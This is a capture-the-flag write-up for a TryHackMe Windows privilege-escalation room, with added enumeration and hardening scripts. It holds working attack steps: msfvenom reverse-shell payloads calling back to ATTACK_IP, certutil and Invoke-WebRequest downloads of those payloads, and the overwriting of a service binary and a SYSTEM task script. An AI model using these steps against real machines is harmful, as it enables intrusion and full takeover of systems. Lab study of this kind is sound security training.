Windows Jump (TryHackMe)

Link to the Privilege Escalation Challenge on TryHackMe: Windows Jump
Challenge
A routine vulnerability scan flagged a Windows machine on the internal network; nothing alarming on the surface, just a standard workstation left behind after a round of layoffs. IT never cleaned it up properly. Your job is to find out how badly. Your objective is to escalate from guest access all the way through:
guest → thmuser → notadmin → svcadmin → SYSTEM
Answer the questions below
What are the contents of flag1.txt?
enum4linux -S TARGET_IP
ENUM4LINUX - next generation (v1.3.10)
==========================
| Target Information |
==========================
[*] Target ........... TARGET_IP
[*] Username ......... ''
[*] Random Username .. 'beutqkwr'
[*] Password ......... ''
[*] Timeout .......... 10 second(s)
======================================
| Listener Scan on TARGET_IP |
======================================
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================
| SMB Dialect Check on TARGET_IP |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.0.2: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false
============================================================
| Domain Information via SMB session for TARGET_IP |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: PRIVESC
NetBIOS domain name: ''
DNS domain: privesc
FQDN: privesc
Derived membership: workgroup member
Derived domain: unknown
==========================================
| RPC Session Check on TARGET_IP |
==========================================
[*] Check for anonymous access (null session)
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for guest access
[+] Server allows authentication via username 'beutqkwr' and password ''
[H] Rerunning enumeration with user 'beutqkwr' might give more results
[!] Aborting remainder of tests, sessions are possible, but not with the provided credentials (see session check results)
Completed after 0.24 seconds
nmap --script smb-enum-shares -p 445 TARGET_IP
PORT STATE SERVICE
445/tcp open microsoft-ds
crackmapexec smb TARGET_IP --shares
SMB TARGET_IP 445 PRIVESC [*] Windows 10.0 Build 17763 x64 (name:PRIVESC) (domain:privesc) (signing:False) (SMBv1:False)
SMB TARGET_IP 445 PRIVESC [-] Error getting user: list index out of range
SMB TARGET_IP 445 PRIVESC [-] Error enumerating shares: [Errno 32] Broken pipe
smbclient -L //TARGET_IP -U 'guest'%''
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Public Disk Public file share
SMB1 disabled -- no workgroup available
crackmapexec smb TARGET_IP -u 'guest' -p '' --shares
SMB TARGET_IP 445 PRIVESC [*] Windows 10.0 Build 17763 x64 (name:PRIVESC) (domain:privesc) (signing:False) (SMBv1:False)
SMB TARGET_IP 445 PRIVESC [+] privesc\guest:
SMB TARGET_IP 445 PRIVESC [*] Enumerated shares
SMB TARGET_IP 445 PRIVESC Share Permissions Remark
SMB TARGET_IP 445 PRIVESC ----- ----------- ------
SMB TARGET_IP 445 PRIVESC ADMIN$ Remote Admin
SMB TARGET_IP 445 PRIVESC C$ Default share
SMB TARGET_IP 445 PRIVESC IPC$ READ Remote IPC
SMB TARGET_IP 445 PRIVESC Public READ Public file share
enum4linux -S -u 'guest' -p '' TARGET_IP
ENUM4LINUX - next generation (v1.3.10)
==========================
| Target Information |
==========================
[*] Target ........... TARGET_IP
[*] Username ......... 'guest'
[*] Random Username .. 'nihhqcrh'
[*] Password ......... ''
[*] Timeout .......... 10 second(s)
======================================
| Listener Scan on TARGET_IP |
======================================
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================
| SMB Dialect Check on TARGET_IP |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.0.2: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false
============================================================
| Domain Information via SMB session for TARGET_IP |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: PRIVESC
NetBIOS domain name: ''
DNS domain: privesc
FQDN: privesc
Derived membership: workgroup member
Derived domain: unknown
==========================================
| RPC Session Check on TARGET_IP |
==========================================
[*] Check for anonymous access (null session)
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for password authentication
[+] Server allows authentication via username 'guest' and password ''
[*] Check for guest access
[+] Server allows authentication via username 'nihhqcrh' and password ''
[H] Rerunning enumeration with user 'nihhqcrh' might give more results
====================================================
| Domain Information via RPC for TARGET_IP |
====================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member
=======================================
| Shares via RPC on TARGET_IP |
=======================================
[*] Enumerating shares
[+] Found 4 share(s):
ADMIN$:
comment: Remote Admin
type: Disk
C$:
comment: Default share
type: Disk
IPC$:
comment: Remote IPC
type: IPC
Public:
comment: Public file share
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share Public
[+] Mapping: OK, Listing: OK
Completed after 0.83 seconds
nmap -sC -sV -p- TARGET_IP --min-rate 1000
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-23T17:42:25+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: PRIVESC
| NetBIOS_Domain_Name: PRIVESC
| NetBIOS_Computer_Name: PRIVESC
| DNS_Domain_Name: privesc
| DNS_Computer_Name: privesc
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-23T17:42:17+00:00
| ssl-cert: Subject: commonName=privesc
| Not valid before: 2026-05-10T06:39:22
|_Not valid after: 2026-11-09T06:39:22
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- Through smbclient we find a text file in the Public share that holds the default credentials for thmuser. With those credentials we can log in over RDP (3389 is open in the nmap scan) and look for flag1.
smbclient //TARGET_IP/Public -U 'guest'%''
smb: \> ls
smb: \> dir
smb: \> get welcome.txt
cat welcome.txt
Welcome to CORP-NET.
New employee default credentials
================================
Username : thmuser
Password : Password1!
Please change your password after first login.
- Launch RDP using the command below:
xfreerdp /u:thmuser /p:'Password1!' /v:TARGET_IP
Looking around the file system as thmuser, we find flag1. We can also see where the other three flag files live, but we don't have permission to read them; getting at them is what the privilege-escalation steps in the next questions are for.
What are the contents of flag2.txt?
PS C:\Users\thmuser.PRIVESC> cmdkey \list
The command line parameters are incorrect.
- Typo: cmdkey switches use a forward slash, so this should be cmdkey /list (it shows credentials saved for the current user), as the usage text it printed makes clear:
The syntax of this command is:
CMDKEY [{/add | /generic}:targetname {/smartcard | /user:username {/pass{:password}}} | /delete{:targetname | /ras} | /list{:targetname}]
Examples:
To list available credentials:
cmdkey /list
cmdkey /list:targetname
To create domain credentials:
cmdkey /add:targetname /user:username /pass:password
cmdkey /add:targetname /user:username /pass
cmdkey /add:targetname /user:username
cmdkey /add:targetname /smartcard
To create generic credentials:
The /add switch may be replaced by /generic to create generic credentials
To delete existing credentials:
cmdkey /delete:targetname
To delete RAS credentials:
cmdkey /delete /ras
- Basic local enumeration from the thmuser session (typed in PowerShell, hence the cmd /c wrappers; the profile directory is C:\Users\thmuser.PRIVESC, so adjust the PSReadLine history path if the one below is not found):
cmd /c "whoami /priv"
cmd /c "whoami /groups"
cmd /c "type C:\Users\thmuser\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
cmd /c "reg query ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"""
cmd /c "schtasks /query /fo LIST /v" | findstr -i "notadmin"
cmd /c "net users"
- The Winlogon key is the one that pays off here: it holds the AutoAdminLogon settings (DefaultUserName/DefaultPassword), which any local user can read, and that is where notadmin's password P@ssw0rd! comes from (the flag name hints at it). The schtasks query and net users tell us which other local accounts exist and what runs as whom, which we need for flag3 and flag4.
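The manual checks above cover the three weaknesses this box chains together (autologon credentials in Winlogon, a service binary in a directory the user can write, and a scheduled task whose script the user can write). The script below is an added example written for this page, not the room's own material; it reads the registry, the SCM and the task scheduler at run time and reports only what the current user can actually write, so run it once as thmuser and again from each shell you gain. No names or paths are hard-coded; the assumption is only that it runs on the target itself.

```powershell
# Added example (editor's, not from the TryHackMe room). Run in the RDP session as
# thmuser; rerun as each account you reach, since writability depends on who asks.

function Test-PathWritable {
    # Probe for write access instead of reading ACLs by eye: rights granted through
    # nested groups are easy to misjudge. Directory: create and delete an empty file.
    # File: open for write without truncating. A running service binary fails the file
    # probe with a sharing violation even when the ACL allows writing, so for services
    # the directory result is the one that matters.
    param([Parameter(Mandatory)][string]$Path)
    try {
        if (Test-Path -LiteralPath $Path -PathType Container -ErrorAction SilentlyContinue) {
            $probe = Join-Path $Path ('probe-' + [guid]::NewGuid().ToString('N'))
            [IO.File]::WriteAllText($probe, '')
            Remove-Item -LiteralPath $probe -Force
            return $true
        }
        if (Test-Path -LiteralPath $Path -PathType Leaf -ErrorAction SilentlyContinue) {
            $fs = [IO.File]::Open($Path, [IO.FileMode]::Open, [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite)
            $fs.Dispose()
            return $true
        }
    } catch { }
    return $false
}

function Get-WinlogonAutoLogon {
    # Standard users can read this key. DefaultPassword is plaintext when present;
    # AutoAdminLogon=1 without DefaultPassword means the password sits in an LSA secret.
    $p = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    [pscustomobject]@{
        AutoAdminLogon    = $p.AutoAdminLogon
        DefaultDomainName = $p.DefaultDomainName
        DefaultUserName   = $p.DefaultUserName
        DefaultPassword   = $p.DefaultPassword
    }
}

function Get-ServiceImagePath {
    # Executable from an ImagePath: the quoted path, or the first token of an unquoted
    # one. (An unquoted path containing spaces is a separate weakness, not handled here.)
    param([string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($PathName.Trim() -split '\s+')[0]
}

function Get-HijackableService {
    # Services whose binary, or the directory holding it, the current user can write.
    # RunsAs is the account you would gain by replacing the binary.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        $exe  = [Environment]::ExpandEnvironmentVariables((Get-ServiceImagePath $_.PathName))
        $dir  = Split-Path -Path $exe -Parent
        $exeW = Test-PathWritable $exe
        $dirW = if ($dir) { Test-PathWritable $dir } else { $false }
        if ($exeW -or $dirW) {
            [pscustomobject]@{
                Service = $_.Name; RunsAs = $_.StartName; State = $_.State
                Binary = $exe; ExeWritable = $exeW; DirWritable = $dirW
            }
        }
    }
}

function Get-HijackableTask {
    # Enabled tasks whose program, or a file named in its arguments (the "cmd /c
    # script.bat" pattern), the current user can write. Tasks whose ACL hides them
    # from standard users do not appear at all, so an empty list is not proof.
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($action in @($task.Actions)) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $candidates = @($action.Execute) + @($action.Arguments -split '\s+')
            foreach ($c in $candidates) {
                if ([string]::IsNullOrWhiteSpace($c)) { continue }
                $file = [Environment]::ExpandEnvironmentVariables($c.Trim('"'))
                if ((Test-Path -LiteralPath $file -PathType Leaf -ErrorAction SilentlyContinue) -and (Test-PathWritable $file)) {
                    [pscustomobject]@{
                        Task     = $task.TaskPath + $task.TaskName
                        RunsAs   = $task.Principal.UserId
                        RunLevel = $task.Principal.RunLevel
                        Writable = $file
                    }
                }
            }
        }
    }
}

'== Winlogon autologon =='
Get-WinlogonAutoLogon | Format-List
'== Services with a writable binary or binary directory (check RunsAs) =='
Get-HijackableService | Format-Table -AutoSize
'== Tasks with a writable action file (check RunsAs / RunLevel) =='
Get-HijackableTask | Format-Table -AutoSize
```

Run as thmuser, the Winlogon block should give up the notadmin credentials; run again from the notadmin prompt, THMSvc should be listed with svcadmin as RunsAs and DirWritable true; run from the svcadmin reverse shell (for example with powershell -ep bypass -File), the task list should show Cleanup.bat. Each finding only appears when the script runs as an account that holds the write right, which is why the chain has to be walked one account at a time.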
- With the notadmin credentials we can try RDP directly (the second form adds an explicit keyboard layout):
xfreerdp /u:notadmin /p:'P@ssw0rd!' /v:TARGET_IP
xfreerdp /u:notadmin /p:'P@ssw0rd!' /v:TARGET_IP /kbd:US /kbd-type:7
- Alternatively, from the thmuser RDP session, spawn a command prompt as notadmin with runas. It prompts for the password; enter P@ssw0rd!:
runas /user:notadmin cmd
Enter the password for notadmin:
Attempting to start cmd as user "PRIVESC\notadmin" ...
dir \Users\notadmin\Desktop
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\notadmin\Desktop
05/11/2026 06:41 AM <DIR> .
05/11/2026 06:41 AM <DIR> ..
05/11/2026 06:41 AM 27 flag2.txt
1 File(s) 27 bytes
2 Dir(s) 14,699,880,448 bytes free
C:\Windows\system32>type \Users\notadmin\Desktop\flag2.txt
THM{w1nl0g0n_REDACTED_3xp0s3d}
What are the contents of flag3.txt?
- Back in the thmuser RDP session, get a notadmin prompt again with runas:
xfreerdp /u:thmuser /p:'Password1!' /v:TARGET_IP
runas /user:notadmin cmd
Enter the password for notadmin: P@ssw0rd!
- The THMSvc service runs as svcadmin and its binary lives in C:\Windows\THMSVC, a directory notadmin can write to, so we replace svc.exe with a reverse shell and start the service. Before overwriting anything, confirm both facts (sc qc THMSvc shows the binary path and the account; icacls C:\Windows\THMSVC shows who can write there) and keep a copy of the original svc.exe, because the writeup below never takes one and the service is useless afterwards without it.
- Build the payload with the exe-service format. A plain exe started by the Service Control Manager never reports itself as running, so the SCM kills it after about 30 seconds (error 1053) and takes the shell with it; exe-service wraps the payload in a proper service executable.
nc -lvnp 4545
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK_IP LPORT=4545 -f exe-service -o svc.exe
python3 -m http.server 8000
- From the notadmin prompt, fetch it over the service binary and start the service:
powershell -c "Invoke-WebRequest -Uri http://ATTACK_IP:8000/svc.exe -OutFile C:\Windows\THMSVC\svc.exe"
sc start THMSvc
nc -lvnp 4545
Listening on 0.0.0.0 4545
Connection received on 10.114.177.1 49948
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type \Users\svcadmin\Desktop\flag3.txt
type \Users\svcadmin\Desktop\flag3.txt
THM{s3rv1c3_REDACTED_h1j4ck3d}
What are the contents of flag4.txt?
- Same idea one level up: a scheduled task runs C:\Windows\Tasks\Cleanup.bat as SYSTEM (the schtasks entry is not reproduced in this log, but the flag name confirms it), and svcadmin can write that script. Generate a second payload on a new port and serve it; a plain exe is fine here because it is launched by a batch file, not by the SCM:
nc -lvnp 5555
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK_IP LPORT=5555 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: shell.exe
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.114.177.1 - - [24/Jun/2026 07:49:57] "GET /svc.exe HTTP/1.1" 200 -
10.114.177.1 - - [24/Jun/2026 07:50:42] "GET /svc.exe HTTP/1.1" 200 -
- From the svcadmin shell, point Cleanup.bat at the payload. This overwrites whatever the script did before (no backup was taken); the trailing space echo leaves before the redirect is harmless in a batch file. The command shows up twice in the raw log only because the reverse shell echoes its input:
cmd /c "echo C:\Windows\Tasks\shell.exe > C:\Windows\Tasks\Cleanup.bat"
C:\Windows\system32>sc start THMSvc
sc start THMSvc
SERVICE_NAME: THMSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 3468
FLAGS :
C:\Windows\system32>certutil -urlcache -split -f http://ATTACK_IP:8000/shell.exe C:\Windows\Tasks\shell.exe
**** Online ****
0000 ...
1e00
CertUtil: -URLCache command completed successfully.
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.114.177.1 - - [24/Jun/2026 08:07:12] "GET /shell.exe HTTP/1.1" 200 -
10.114.177.1 - - [24/Jun/2026 08:07:12] "GET /shell.exe HTTP/1.1" 200 -
- (Same server as before; certutil requests the file twice, hence the two GET lines.)
C:\Windows\system32>dir C:\Windows\Tasks\shell.exe
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Windows\Tasks
06/24/2026 08:07 AM 7,680 shell.exe
1 File(s) 7,680 bytes
0 Dir(s) 14,704,111,616 bytes free
C:\Windows\system32>type C:\Users\Administrator\Desktop\flag4.txt
Access is denied.
- (The raw log is garbled at this point because two commands were typed into the reverse shell on top of each other; the useful result is that svcadmin cannot read the Administrator desktop, so we still need the SYSTEM shell.)
C:\Windows\system32>sc start THMSvc
sc start THMSvc
SERVICE_NAME: THMSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 248
FLAGS :
C:\Windows\system32>
- Once the scheduled task runs Cleanup.bat (it fires on its own schedule; there is no manual trigger in this log), shell.exe runs as SYSTEM and the second listener gets the callback. flag4 turns out to be at C:\flag4.txt rather than on the Administrator desktop:
nc -lvnp 5555
C:\Windows\system32>type C:\flag4.txt
type C:\flag4.txt
THM{t4sk_REDACTED_t0_SYST3M}
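The challenge text blames the whole chain on IT never cleaning the workstation up. The script below is an added example written for this page, not part of the room: it is the clean-up that closes the three findings (plaintext autologon password, writable service directory, writable task script) and then verifies the result. It runs from an elevated PowerShell on the target; the names THMSvc, C:\Windows\THMSVC and C:\Windows\Tasks\Cleanup.bat are taken from the writeup above, and restoring the original svc.exe and Cleanup.bat from a known-good copy is assumed to happen separately.

```powershell
# Added example (editor's, not from the TryHackMe room). Run elevated on PRIVESC.
# Assumed from the writeup: service THMSvc in C:\Windows\THMSVC, task script
# C:\Windows\Tasks\Cleanup.bat. The backdoored svc.exe and rewritten Cleanup.bat
# still need restoring from a known-good copy; that part is not automated here.

# 1. Winlogon: drop the plaintext password and switch autologon off. If the box must
#    autologon, it must be as an account whose password is worth nothing anywhere else.
$wl = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
Remove-ItemProperty -Path $wl -Name DefaultPassword -ErrorAction SilentlyContinue
Set-ItemProperty -Path $wl -Name AutoAdminLogon -Value '0'

# 2. Writable only by SYSTEM and Administrators; Users keep read/execute so svcadmin
#    can still run svc.exe and the task can still read its script. /reset first wipes
#    explicit ACEs such as the one that let notadmin write, then inheritance is cut and
#    exactly three ACEs are granted. icacls rather than Set-Acl because Set-Acl trips
#    over TrustedInstaller-owned objects under C:\Windows.
function Set-AdminOnlyWrite {
    param([Parameter(Mandatory)][string]$Path)
    $inherit = if (Test-Path -LiteralPath $Path -PathType Container) { '(OI)(CI)' } else { '' }
    & icacls.exe $Path /reset /t /c | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "icacls /reset failed on $Path (exit $LASTEXITCODE)" }
    & icacls.exe $Path /inheritance:r /grant:r "SYSTEM:${inherit}F" "Administrators:${inherit}F" "Users:${inherit}RX" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "icacls /grant failed on $Path (exit $LASTEXITCODE)" }
}
Set-AdminOnlyWrite 'C:\Windows\THMSVC'
Set-AdminOnlyWrite 'C:\Windows\Tasks\Cleanup.bat'

# 3. Verify: no plaintext password left, and no write-capable ACE on either path that
#    belongs to anyone other than SYSTEM or Administrators.
function Test-Hardened {
    param([string[]]$Paths)
    $pwPresent = (Get-ItemProperty -Path $wl).PSObject.Properties.Name -contains 'DefaultPassword'
    $unexpected = foreach ($p in $Paths) {
        (Get-Acl -LiteralPath $p).Access | Where-Object {
            $_.FileSystemRights -match 'Write|Modify|FullControl' -and
            $_.IdentityReference.Value -notin 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators'
        } | ForEach-Object { "$p : $($_.IdentityReference.Value) $($_.FileSystemRights)" }
    }
    [pscustomobject]@{
        PlaintextPasswordPresent = $pwPresent
        UnexpectedWriteAces      = @($unexpected)
    }
}
Test-Hardened 'C:\Windows\THMSVC', 'C:\Windows\Tasks\Cleanup.bat'
```

A clean run ends with PlaintextPasswordPresent False and an empty UnexpectedWriteAces list. Two things the script deliberately leaves to a human: the service binary and the batch file must come back from a trusted copy, and a task that has to run as SYSTEM is better off with its script somewhere under an admin-only directory than in C:\Windows\Tasks, where every authenticated user can create files.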